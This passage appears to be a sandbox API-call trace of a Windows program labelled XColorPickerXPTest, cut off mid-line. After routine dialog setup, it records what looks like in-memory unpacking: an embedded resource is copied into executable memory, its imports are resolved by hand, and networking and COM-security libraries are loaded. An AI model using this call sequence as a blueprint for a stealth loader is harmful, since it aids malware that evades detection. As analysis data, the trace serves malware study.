[0050.957] RegCreateKeyExA (in: hKey=0xd8, lpSubKey="Colors", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18eb28, lpdwDisposition=0x18eb24 | out: phkResult=0x18eb28*=0xd4, lpdwDisposition=0x18eb24*=0x2) returned 0x0 [0050.957] RegCloseKey (hKey=0xd8) returned 0x0 [0050.957] RegQueryValueExA (in: hKey=0xd4, lpValueName="BackgroundCustom", lpReserved=0x0, lpType=0x18eb44, lpData=0x0, lpcbData=0x18eb40*=0x0 | out: lpType=0x18eb44*=0x0, lpData=0x0, lpcbData=0x18eb40*=0x0) returned 0x2 [0050.957] RegCloseKey (hKey=0xd4) returned 0x0 [0050.958] GetThreadLocale () returned 0x409 [0050.958] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x250ea0 [0050.958] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x4) returned 0x250d70 [0050.959] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x170) returned 0x25d9e8 [0050.959] LockResource (hResData=0x25d9e8) returned 0x25d9e8 [0050.959] GetCurrentThreadId () returned 0xae0 [0050.959] SetWindowsHookExA (idHook=5, lpfn=0x415e95, hmod=0x0, dwThreadId=0xae0) returned 0x50229 [0050.960] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x60) returned 0x29f0ec0 [0050.960] GetModuleHandleA (lpModuleName="COMCTL32.DLL") returned 0x754e0000 [0050.960] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x754e0000 [0050.960] GetProcAddress (hModule=0x754e0000, lpProcName="InitCommonControlsEx") returned 0x755009ce [0050.961] InitCommonControlsEx (picce=0x18fb04) returned 1 [0050.962] FreeLibrary (hLibModule=0x754e0000) returned 1 [0050.962] GetModuleHandleA (lpModuleName="COMCTL32.DLL") returned 0x754e0000 [0050.962] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x754e0000 [0050.962] GetProcAddress (hModule=0x754e0000, lpProcName="InitCommonControlsEx") returned 0x755009ce [0050.962] InitCommonControlsEx (picce=0x18fb04) returned 1 [0050.964] FreeLibrary (hLibModule=0x754e0000) returned 1 [0050.964] GetModuleHandleA (lpModuleName="COMCTL32.DLL") returned 0x754e0000 [0050.964] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x754e0000 [0050.964] GetProcAddress (hModule=0x754e0000, lpProcName="InitCommonControlsEx") returned 0x755009ce [0050.964] InitCommonControlsEx (picce=0x18fb04) returned 1 [0050.964] FreeLibrary (hLibModule=0x754e0000) returned 1 [0050.964] GetModuleHandleA (lpModuleName="COMCTL32.DLL") returned 0x754e0000 [0050.964] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x754e0000 [0050.965] GetProcAddress (hModule=0x754e0000, lpProcName="InitCommonControlsEx") returned 0x755009ce [0050.965] InitCommonControlsEx (picce=0x18fb04) returned 1 [0050.965] FreeLibrary (hLibModule=0x754e0000) returned 1 [0050.965] GetModuleHandleA (lpModuleName="COMCTL32.DLL") returned 0x754e0000 [0050.987] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x754e0000 [0050.987] GetProcAddress (hModule=0x754e0000, lpProcName="InitCommonControlsEx") returned 0x755009ce [0050.988] InitCommonControlsEx (picce=0x18fb04) returned 1 [0050.988] FreeLibrary (hLibModule=0x754e0000) returned 1 [0050.988] GetModuleHandleA (lpModuleName="COMCTL32.DLL") returned 0x754e0000 [0050.988] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x754e0000 [0050.988] GetProcAddress (hModule=0x754e0000, lpProcName="InitCommonControlsEx") returned 0x755009ce [0050.988] InitCommonControlsEx (picce=0x18fb04) returned 1 [0050.988] FreeLibrary (hLibModule=0x754e0000) returned 1 [0050.988] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x31) returned 0x29f0f28 [0050.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MS Sans Serif", cchWideChar=-1, lpMultiByteStr=0x29f0f38, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS Sans Serif", lpUsedDefaultChar=0x0) returned 14 [0050.989] CreateDialogIndirectParamA (hInstance=0x400000, lpTemplate=0x25d9e8, hWndParent=0x0, lpDialogFunc=0x412e47, dwInitParam=0x0) [0050.994] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x44) returned 0x29f0f68 [0050.994] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x7c) returned 0x29f0fb8 [0050.994] GetParent (hWnd=0x6015a) returned 0x0 [0050.994] SetWindowLongA (hWnd=0x6015a, nIndex=-4, dwNewLong=4281390) returned 2009836189 [0050.995] CallNextHookEx (hhk=0x50229, nCode=3, wParam=0x6015a, lParam=0x18f698) returned 0x0 [0050.996] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x81, wParam=0x0, lParam=0x18f6e4) returned 0x1 [0050.996] GetClassInfoExA (in: hInstance=0x0, lpszClass="#32768", lpwcx=0x18f4f0 | out: lpwcx=0x18f4f0) returned 1 [0050.996] GetClassLongA (hWnd=0x6011c, nIndex=-32) returned 0xc026 [0050.996] GetWindowLongA (hWnd=0x6011c, nIndex=-4) returned 1997947921 [0050.997] GetPropA (hWnd=0x6011c, lpString="AfxOldWndProc423") returned 0x0 [0050.997] SetPropA (hWnd=0x6011c, lpString="AfxOldWndProc423", hData=0x77164411) returned 1 [0050.997] GetPropA (hWnd=0x6011c, lpString="AfxOldWndProc423") returned 0x77164411 [0050.997] GlobalAddAtomA (lpString="AfxOldWndProc423") returned 0xc169 [0050.997] SetWindowLongA (hWnd=0x6011c, nIndex=-4, dwNewLong=4283709) returned 2010013147 [0050.997] CallNextHookEx (hhk=0x50229, nCode=3, wParam=0x6011c, lParam=0x18f698) returned 0x0 [0050.997] GetPropA (hWnd=0x6011c, lpString="AfxOldWndProc423") returned 0x77164411 [0050.997] CallWindowProcA (lpPrevWndFunc=0x77164411, hWnd=0x6011c, Msg=0x81, wParam=0x0, lParam=0x18f6e4) returned 0x1 [0050.997] GetPropA (hWnd=0x6011c, lpString="AfxOldWndProc423") returned 0x77164411 [0050.998] CallWindowProcA (lpPrevWndFunc=0x77164411, hWnd=0x6011c, Msg=0x83, wParam=0x0, lParam=0x18f6d0) returned 0x0 [0050.998] GetPropA (hWnd=0x6011c, lpString="AfxOldWndProc423") returned 0x77164411 [0050.998] CallWindowProcA (lpPrevWndFunc=0x77164411, hWnd=0x6011c, Msg=0x1, wParam=0x0, lParam=0x18f6e4) returned 0x0 [0050.998] GetPropA (hWnd=0x6011c, lpString="AfxOldWndProc423") returned 0x77164411 [0050.998] CallWindowProcA (lpPrevWndFunc=0x77164411, hWnd=0x6011c, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0050.998] GetPropA (hWnd=0x6011c, lpString="AfxOldWndProc423") returned 0x77164411 [0050.998] CallWindowProcA (lpPrevWndFunc=0x77164411, hWnd=0x6011c, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0050.998] GetPropA (hWnd=0x6011c, lpString="AfxOldWndProc423") returned 0x77164411 [0050.998] CallWindowProcA (lpPrevWndFunc=0x77164411, hWnd=0x6011c, Msg=0x287, wParam=0x21, lParam=0x0) returned 0x0 [0050.999] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x83, wParam=0x0, lParam=0x18f6d0) returned 0x0 [0051.001] GetCurrentProcess () returned 0xffffffff [0051.232] GetCurrentProcess () returned 0xffffffff [0051.233] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x1, wParam=0x0, lParam=0x18f6e4) returned 0x0 [0051.234] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x5, wParam=0x0, lParam=0xca0177) returned 0x0 [0051.234] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x3, wParam=0x0, lParam=0x190003) returned 0x0 [0051.236] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x204) returned 0x29f1040 [0051.236] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x1c) returned 0x29f2500 [0051.236] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x34) returned 0x29f2528 [0051.236] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x30, wParam=0x190a01bd, lParam=0x0) returned 0x0 [0051.238] CallNextHookEx (hhk=0x50229, nCode=3, wParam=0x6011a, lParam=0x18f698) returned 0x0 [0051.243] CallNextHookEx (hhk=0x50229, nCode=3, wParam=0x4011e, lParam=0x18f698) returned 0x0 [0051.248] GetDlgItem (hDlg=0x6015a, nIDDlgItem=1002) returned 0x4011e [0051.248] GetTopWindow (hWnd=0x4011e) returned 0x0 [0051.248] GetTopWindow (hWnd=0x6015a) returned 0x6011a [0051.248] GetDlgItem (hDlg=0x6011a, nIDDlgItem=1002) returned 0x0 [0051.248] GetTopWindow (hWnd=0x6011a) returned 0x0 [0051.248] GetWindow (hWnd=0x6011a, uCmd=0x2) returned 0x4011e [0051.248] GetDlgItem (hDlg=0x4011e, nIDDlgItem=1002) returned 0x0 [0051.248] GetTopWindow (hWnd=0x4011e) returned 0x0 [0051.248] GetWindow (hWnd=0x4011e, uCmd=0x2) returned 0x0 [0051.248] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x2c, wParam=0x3ea, lParam=0x18f46c) returned 0x0 [0051.250] CallNextHookEx (hhk=0x50229, nCode=3, wParam=0x50116, lParam=0x18f00c) returned 0x0 [0051.252] GetDlgItem (hDlg=0x6015a, nIDDlgItem=1002) returned 0x4011e [0051.252] GetTopWindow (hWnd=0x4011e) returned 0x50116 [0051.252] GetDlgItem (hDlg=0x4011e, nIDDlgItem=1002) returned 0x0 [0051.252] GetTopWindow (hWnd=0x4011e) returned 0x50116 [0051.252] GetDlgItem (hDlg=0x50116, nIDDlgItem=1002) returned 0x0 [0051.252] GetTopWindow (hWnd=0x50116) returned 0x0 [0051.252] GetWindow (hWnd=0x50116, uCmd=0x2) returned 0x0 [0051.252] GetTopWindow (hWnd=0x6015a) returned 0x6011a [0051.252] GetDlgItem (hDlg=0x6011a, nIDDlgItem=1002) returned 0x0 [0051.252] GetTopWindow (hWnd=0x6011a) returned 0x0 [0051.253] GetWindow (hWnd=0x6011a, uCmd=0x2) returned 0x4011e [0051.253] GetDlgItem (hDlg=0x4011e, nIDDlgItem=1002) returned 0x0 [0051.253] GetTopWindow (hWnd=0x4011e) returned 0x50116 [0051.253] GetDlgItem (hDlg=0x50116, nIDDlgItem=1002) returned 0x0 [0051.253] GetTopWindow (hWnd=0x50116) returned 0x0 [0051.253] GetWindow (hWnd=0x50116, uCmd=0x2) returned 0x0 [0051.253] GetWindow (hWnd=0x4011e, uCmd=0x2) returned 0x0 [0051.253] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x2c, wParam=0x3ea, lParam=0x18ee10) returned 0x0 [0051.293] CallNextHookEx (hhk=0x50229, nCode=3, wParam=0x50114, lParam=0x18f698) returned 0x0 [0051.293] CallNextHookEx (hhk=0x50229, nCode=3, wParam=0x7025e, lParam=0x18f698) returned 0x0 [0051.295] GetDlgItem (hDlg=0x6015a, nIDDlgItem=1003) returned 0x7025e [0051.295] GetTopWindow (hWnd=0x7025e) returned 0x0 [0051.295] GetTopWindow (hWnd=0x6015a) returned 0x6011a [0051.295] GetDlgItem (hDlg=0x6011a, nIDDlgItem=1003) returned 0x0 [0051.295] GetTopWindow (hWnd=0x6011a) returned 0x0 [0051.295] GetWindow (hWnd=0x6011a, uCmd=0x2) returned 0x4011e [0051.295] GetDlgItem (hDlg=0x4011e, nIDDlgItem=1003) returned 0x0 [0051.295] GetTopWindow (hWnd=0x4011e) returned 0x0 [0051.295] GetWindow (hWnd=0x4011e, uCmd=0x2) returned 0x50114 [0051.295] GetDlgItem (hDlg=0x50114, nIDDlgItem=1003) returned 0x0 [0051.296] GetTopWindow (hWnd=0x50114) returned 0x0 [0051.296] GetWindow (hWnd=0x50114, uCmd=0x2) returned 0x7025e [0051.296] GetDlgItem (hDlg=0x7025e, nIDDlgItem=1003) returned 0x0 [0051.296] GetTopWindow (hWnd=0x7025e) returned 0x0 [0051.296] GetWindow (hWnd=0x7025e, uCmd=0x2) returned 0x0 [0051.296] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x2c, wParam=0x3eb, lParam=0x18f46c) returned 0x0 [0051.296] CallNextHookEx (hhk=0x50229, nCode=3, wParam=0x50260, lParam=0x18f00c) returned 0x0 [0051.297] GetDlgItem (hDlg=0x6015a, nIDDlgItem=1003) returned 0x7025e [0051.297] GetTopWindow (hWnd=0x7025e) returned 0x50260 [0051.297] GetDlgItem (hDlg=0x7025e, nIDDlgItem=1003) returned 0x0 [0051.297] GetTopWindow (hWnd=0x7025e) returned 0x50260 [0051.297] GetDlgItem (hDlg=0x50260, nIDDlgItem=1003) returned 0x0 [0051.297] GetTopWindow (hWnd=0x50260) returned 0x0 [0051.297] GetWindow (hWnd=0x50260, uCmd=0x2) returned 0x0 [0051.297] GetTopWindow (hWnd=0x6015a) returned 0x6011a [0051.297] GetDlgItem (hDlg=0x6011a, nIDDlgItem=1003) returned 0x0 [0051.297] GetTopWindow (hWnd=0x6011a) returned 0x0 [0051.297] GetWindow (hWnd=0x6011a, uCmd=0x2) returned 0x4011e [0051.297] GetDlgItem (hDlg=0x4011e, nIDDlgItem=1003) returned 0x0 [0051.298] GetTopWindow (hWnd=0x4011e) returned 0x0 [0051.298] GetWindow (hWnd=0x4011e, uCmd=0x2) returned 0x50114 [0051.298] GetDlgItem (hDlg=0x50114, nIDDlgItem=1003) returned 0x0 [0051.298] GetTopWindow (hWnd=0x50114) returned 0x0 [0051.298] GetWindow (hWnd=0x50114, uCmd=0x2) returned 0x7025e [0051.298] GetDlgItem (hDlg=0x7025e, nIDDlgItem=1003) returned 0x0 [0051.298] GetTopWindow (hWnd=0x7025e) returned 0x50260 [0051.298] GetDlgItem (hDlg=0x50260, nIDDlgItem=1003) returned 0x0 [0051.298] GetTopWindow (hWnd=0x50260) returned 0x0 [0051.298] GetWindow (hWnd=0x50260, uCmd=0x2) returned 0x0 [0051.298] GetWindow (hWnd=0x7025e, uCmd=0x2) returned 0x0 [0051.298] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x2c, wParam=0x3eb, lParam=0x18ee10) returned 0x0 [0051.301] CallNextHookEx (hhk=0x50229, nCode=3, wParam=0x40262, lParam=0x18f698) returned 0x0 [0051.303] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x55, wParam=0x40262, lParam=0x3) returned 0x1 [0051.303] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0051.303] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0051.304] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0051.311] CallNextHookEx (hhk=0x50229, nCode=3, wParam=0x3015c, lParam=0x18f698) returned 0x0 [0051.312] GetWindowRect (in: hWnd=0x6015a, lpRect=0x18f8bc | out: lpRect=0x18f8bc) returned 1 [0051.312] GetWindowLongA (hWnd=0x6015a, nIndex=-16) returned -2067136316 [0051.312] CallWindowProcA (lpPrevWndFunc=0x77cbaa9d, hWnd=0x6015a, Msg=0x110, wParam=0x4011e, lParam=0x0) [0051.313] GetSystemMenu (hWnd=0x6015a, bRevert=0) returned 0x2200af [0051.313] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x60) returned 0x29f2568 [0051.313] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x204) returned 0x29f25d0 [0051.313] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x1c) returned 0x29f27e0 [0051.313] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x34) returned 0x29f2808 [0051.314] GetThreadLocale () returned 0x409 [0051.314] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x250ec0 [0051.315] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x250d10 [0051.315] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x250d70 | out: hHeap=0x250000) returned 1 [0051.315] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x12e) returned 0x25db60 [0051.315] LockResource (hResData=0x25db60) returned 0x25db60 [0051.315] SizeofResource (hModule=0x400000, hResInfo=0x250ec4) returned 0x12e [0051.316] GetVersionExA (in: lpVersionInformation=0x18f424*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x282, dwMinorVersion=0x213, dwBuildNumber=0x257, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f424*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0051.316] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="&About XColorPickerXPTest...", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0051.316] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x2d) returned 0x29f2848 [0051.316] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="&About XColorPickerXPTest...", cchWideChar=28, lpMultiByteStr=0x29f2858, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="&About XColorPickerXPTest...", lpUsedDefaultChar=0x0) returned 28 [0051.316] AppendMenuA (hMenu=0x2200af, uFlags=0x800, uIDNewItem=0x0, lpNewItem=0x0) returned 1 [0051.316] AppendMenuA (hMenu=0x2200af, uFlags=0x0, uIDNewItem=0x10, lpNewItem="&About XColorPickerXPTest...") returned 1 [0051.316] VirtualAlloc (lpAddress=0x0, dwSize=0x801, flAllocationType=0x3000, flProtect=0x40) returned 0x300000 [0051.316] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x14) returned 0x29f2880 [0051.316] LoadLibraryW (lpLibFileName="ADVAPI32.DLL") returned 0x77710000 [0051.317] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextA") returned 0x777191dd [0051.317] CryptAcquireContextA (in: phProv=0x18f49c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x0 | out: phProv=0x18f49c*=0xebddc8) returned 1 [0051.319] GetCurrentProcess () returned 0xffffffff [0051.508] GetCurrentProcess () returned 0xffffffff [0051.933] GetCurrentProcess () returned 0xffffffff [0051.934] GetCurrentProcess () returned 0xffffffff [0051.945] GetCurrentProcess () returned 0xffffffff [0052.260] GetCurrentProcess () returned 0xffffffff [0052.456] GetCurrentProcess () returned 0xffffffff [0052.457] GetCurrentProcess () returned 0xffffffff [0052.468] CryptAcquireContextA (in: phProv=0x18f49c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x18f49c*=0x0) returned 0 [0052.471] LdrFindResource_U (BaseAddress=0x400000, ResourceInfo=0x18f49c, Level=0x3, ResourceDataEntry=0x18f4b0) [0052.472] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x250ee0 [0052.472] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x25d290 [0052.472] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x250d10 | out: hHeap=0x250000) returned 1 [0052.472] LdrAccessResource (BaseAddress=0x400000, ResourceDataEntry=0x250ee4, Resource=0x18f4b8, Size=0x18f4d0) [0052.473] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2a746) returned 0x26c0048 [0052.475] VirtualAlloc (lpAddress=0x0, dwSize=0x2a746, flAllocationType=0x3000, flProtect=0x40) returned 0x3a0000 [0052.481] GetNativeSystemInfo (in: lpSystemInfo=0x18f42c | out: lpSystemInfo=0x18f42c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0052.481] VirtualAlloc (lpAddress=0x0, dwSize=0x2d000, flAllocationType=0x3000, flProtect=0x4) returned 0x3d0000 [0052.483] LoadLibraryA (lpLibFileName="MSVCRT.dll") returned 0x76f90000 [0052.484] GetProcAddress (hModule=0x76f90000, lpProcName="free") returned 0x76f99894 [0052.484] GetProcAddress (hModule=0x76f90000, lpProcName="wcstombs") returned 0x76fb4137 [0052.484] GetProcAddress (hModule=0x76f90000, lpProcName="strtol") returned 0x76fbe8f0 [0052.484] GetProcAddress (hModule=0x76f90000, lpProcName="mbstowcs") returned 0x76fa03a6 [0052.484] GetProcAddress (hModule=0x76f90000, lpProcName="qsort") returned 0x76f9d3e6 [0052.484] GetProcAddress (hModule=0x76f90000, lpProcName="bsearch") returned 0x76f9b34a [0052.485] GetProcAddress (hModule=0x76f90000, lpProcName="_wcsnicmp") returned 0x76f9aae3 [0052.485] GetProcAddress (hModule=0x76f90000, lpProcName="strlen") returned 0x76fa43d3 [0052.485] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0052.485] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0052.485] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadLocale") returned 0x76d435cf [0052.485] GetProcAddress (hModule=0x76d30000, lpProcName="IsBadReadPtr") returned 0x76d6d075 [0052.485] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0052.486] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0052.486] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0052.486] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0052.486] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualQuery") returned 0x76d4445a [0052.486] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0052.486] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0052.486] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0052.486] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0052.486] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0052.487] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0052.487] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0052.487] VirtualProtect (in: lpAddress=0x3d1000, dwSize=0x1c00, flNewProtect=0x20, lpflOldProtect=0x18f420 | out: lpflOldProtect=0x18f420*=0x4) returned 1 [0052.487] GetCurrentProcess () returned 0xffffffff [0052.489] VirtualProtect (in: lpAddress=0x3d3000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x18f420 | out: lpflOldProtect=0x18f420*=0x4) returned 1 [0052.489] GetCurrentProcess () returned 0xffffffff [0052.489] VirtualProtect (in: lpAddress=0x3d4000, dwSize=0x27c00, flNewProtect=0x4, lpflOldProtect=0x18f420 | out: lpflOldProtect=0x18f420*=0x4) returned 1 [0052.489] GetCurrentProcess () returned 0xffffffff [0052.490] VirtualProtect (in: lpAddress=0x3fc000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x18f420 | out: lpflOldProtect=0x18f420*=0x4) returned 1 [0052.490] GetCurrentProcess () returned 0xffffffff [0052.490] NtFlushInstructionCache (ProcessHandle=0xffffffff, BaseAddress=0x0, NumberOfBytesToFlush=0x0) returned 0x0 [0052.491] GetNativeSystemInfo (in: lpSystemInfo=0x18f33c | out: lpSystemInfo=0x18f33c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0052.491] VirtualAlloc (lpAddress=0x400000, dwSize=0x2b000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0052.491] VirtualAlloc (lpAddress=0x0, dwSize=0x2b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2800000 [0052.492] GetProcessHeap () returned 0xea0000 [0052.492] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x40) returned 0xebbec8 [0052.492] VirtualAlloc (lpAddress=0x2800000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2800000 [0052.492] VirtualAlloc (lpAddress=0x2801000, dwSize=0x1de00, flAllocationType=0x1000, flProtect=0x4) returned 0x2801000 [0052.493] VirtualAlloc (lpAddress=0x281f000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x281f000 [0052.494] VirtualAlloc (lpAddress=0x2825000, dwSize=0x2200, flAllocationType=0x1000, flProtect=0x4) returned 0x2825000 [0052.494] VirtualAlloc (lpAddress=0x2828000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2828000 [0052.495] VirtualAlloc (lpAddress=0x2829000, dwSize=0x1400, flAllocationType=0x1000, flProtect=0x4) returned 0x2829000 [0052.495] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0052.495] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0052.495] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0052.495] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeEx") returned 0x766609ad [0052.496] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0052.496] GetProcAddress (hModule=0x76620000, lpProcName="CoSetProxyBlanket") returned 0x76635ea5 [0052.496] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0052.496] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0052.496] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x18f2cc, dwLength=0x1c | out: lpBuffer=0x18f2cc*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.496] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0052.496] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0052.496] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0052.496] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0052.498] GetCurrentProcess () returned 0xffffffff [0052.904] GetCurrentProcess () returned 0xffffffff [0052.910] GetCurrentProcess () returned 0xffffffff [0052.910] GetCurrentProcess () returned 0xffffffff [0052.931] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x18f2cc, dwLength=0x1c | out: lpBuffer=0x18f2cc*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.931] GetProcAddress (hModule=0x77230000, lpProcName=0x9) returned 0x77232d8b [0052.931] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0052.931] GetProcAddress (hModule=0x77230000, lpProcName=0x6f) returned 0x772337ad [0052.931] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0052.931] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x18f2cc, dwLength=0x1c | out: lpBuffer=0x18f2cc*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.932] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0052.932] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0052.932] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0052.932] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0052.932] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0052.932] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0052.932] GetProcAddress (hModule=0x76d30000, 